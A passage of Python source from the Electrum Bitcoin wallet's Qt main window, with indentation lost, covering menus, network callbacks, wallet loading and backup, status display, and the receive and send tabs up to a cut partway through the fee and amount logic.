QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.connect(self, SIGNAL('new_fx_quotes'), self.on_fx_quotes)
self.connect(self, SIGNAL('new_fx_history'), self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.emit(SIGNAL('new_fx_history'))
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.emit(SIGNAL('new_fx_quotes'))
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.emit(QtCore.SIGNAL('updated'), event, *args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
from electrum.wallet import Imported_Wallet
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address()
if addr:
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possiblity, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
